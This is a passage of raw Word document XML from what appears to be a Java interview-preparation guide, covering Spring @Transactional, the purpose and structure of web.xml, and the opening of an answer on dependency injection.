          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9C279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Transactional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA814E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updateUserInfo(Long userId, String newEmail) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D362F6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 user = userRepository.findById(userId).orElseThrow(() -&gt; new RuntimeException("User not found"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C5E55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setEmail(newEmail);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD74F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The changes are automatically saved when the transaction is committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127DAA9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A06EBF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696BBD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB11CF9"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ensures that the database operations inside updateUserInfo() are executed within a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1254C"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y exception occurs, the transaction will be rolled back automatically, meaning any changes to the User entity will not be persisted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF087DC"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6DC2C">
          <v:rect id="_x0000_i2117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98E60D"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE667A"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ment</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring can be handled programmatically or declaratively using @Transactional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E236C"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clarative Transaction Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with @Transactional is the most common and recommended approach, as it allows Spring to automatically handle the transaction lifecycle (begin, commit, rollback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7351BC8D"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ustomize the behavior of transactions using attributes like propagation, isolation, timeout, and rollbackFor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB50A8"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supports multiple transaction managers (e.g., DataSourceTransactionManager, JpaTransactionManager) based on the data source or ORM being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178BB863" w14:textId="7F561147"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18" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E4CD74" w14:textId="22049011" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00B96CA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="_Toc197867671"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you know the web.xml file? What is the significance of a web.xml file</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w14:paraId="275BFDEF" w14:textId="49D16566" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7"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Yes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deployment Descriptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a configuration file used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java web applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that run on </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Tomcat, Jetty, etc.). It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java EE</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Enterprise Edition) specification, and is typically located in the WEB-INF directory of a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F299012"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ignificance of web.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888B8A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web.xml file serves as the main configuration for the web application and defines various aspects of the application's behavior, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40202499"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vlet Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28E430"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defines </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlets</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are Java classes that handle requests in a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6E0C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servlet is mapped to a specific URL pattern or servlet name, so it can respond to requests matching the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9F5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A4A8C7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8FA54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6676FC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7DB007D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52A8944" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BE0E9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6E74EB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168AE5B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699C88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3527FF33"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istener Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A760FD5"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you to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Listeners</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are objects that listen to certain events, like context initialization or session creation. These can be used for various tasks like logging, auditing, or initializing resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4A431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1FC5B4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4946031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istener-class&gt;com.example.MyListener&lt;/listener-class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF061F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29EB39D1"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 Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015CEC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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to intercept and process requests or responses before they reach the servlet. They can be used for tasks such as logging, authentication, or modifying request/response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAAFE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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B750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08348E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6355C22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6C0640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46F51651" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4365FC0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3A81F0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5E42C2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3D7F65F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5B7736E7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782200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the configuration of </w:t>
      </w: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 xml:space="preserve"> that can be accessed globally by servlets or filters within the application. They are often used to store configuration values that are shared across multiple components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613536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4E74873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6774242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6D9C61A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35A5FC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5D199D6D"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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB93EA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straints</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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50E1B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05F0D6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036645C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058F25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admin/*&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAED80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51A16F3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93444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2524AED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0B539C4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219F68E0" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B87105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078BF2C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method&gt;BASIC&lt;/auth-method&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE06F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ealm-name&gt;ExampleRealm&lt;/realm-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E65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6DCF76E8"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Welcome File List</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B118BA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pecifies the default page (welcome file) to be served when a user accesses the root directory of the web application (e.g., when they access http://localhost:8080/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26884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048435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3F4B8E1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097A28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64433DDB"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rror Page Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8DD7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onfigure error pages in web.xml to display custom error messages when a certain HTTP error code is encountered, such as 404 (Page Not Found) or 500 (Internal Server Error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344E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694ABB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308D112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2ED703E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09BE1B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5D33A725"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ssion Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A015C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can define </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as session timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156F426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6852AF6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lt;session-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720ABC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ssion-timeout&gt;30&lt;/session-timeout&gt; &lt;!-- in minutes --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BFB6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ssion-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898FBD6"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ical Structure of web.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7001EA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xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14900AB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 xmlns="http://java.sun.com/xml/ns/javaee"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F7490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mlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB9366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si:schemaLocation="http://java.sun.com/xml/ns/javaee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55691BB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http://java.sun.com/xml/ns/javaee/web-app_4_0.xsd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58C61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ersion="4.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B5652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F69DD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Context Parameters --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69118F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61C9779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08FEA9D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CC559F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2A1A3F6A" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFF8C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Definition --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C52B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18175FF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53C9DDD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0250BA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6E0EC2B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75001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Mapping --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63559B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64BE7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090C7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3F740D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22DABDD" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2726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Definition --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EAFE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1F34A53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41B4079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32937A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5EC5E00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82FA91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Mapping --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07775EB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0979F15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62B91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7089572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5FE2811C" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8003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Welcome File --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A3BB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3271F84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94FA8D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600D3E82" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7723EB7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Error Page --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D708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76A2B05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5A5447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6E3CA64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27C3CC75" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8776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curity Constraints --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D0559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03710BC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22DD9D7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2AEFE0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lt;url-pattern&gt;/admin/*&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86BC7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7EF91E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60E964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68A8CA9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2E70A25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32102F15" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31EB05C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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A8D20"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volution and Modern Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714BD92"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ith the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.0+</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, many configurations in web.xml can be replaced with </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as @WebServlet, @WebFilter, and @WebListener, making the web.xml file less essential in modern web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B965AE"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hile it's still a valid approach,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using @Configuration classes) has become more popular and is more flexible, especially with Spring-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E7D4E"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6F9A02E8"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eb.xml is a critical part of the Java EE-based web applications for configuring servlets, filters, listeners, security, error pages, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E7BDD"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lthough Spring and newer Java specifications have reduced its necessity, it is still widely used and provides fine-grained control over web application deployment and configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A283D" w14:textId="136EB4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19" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA71226" w14:textId="758D8628" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD1EB9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="_Toc197867672"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the dependency injection</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w14:paraId="44E8A117" w14:textId="46277B61" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6"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pendency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design pattern and one of the core concepts of </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inversion of Control (IoC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
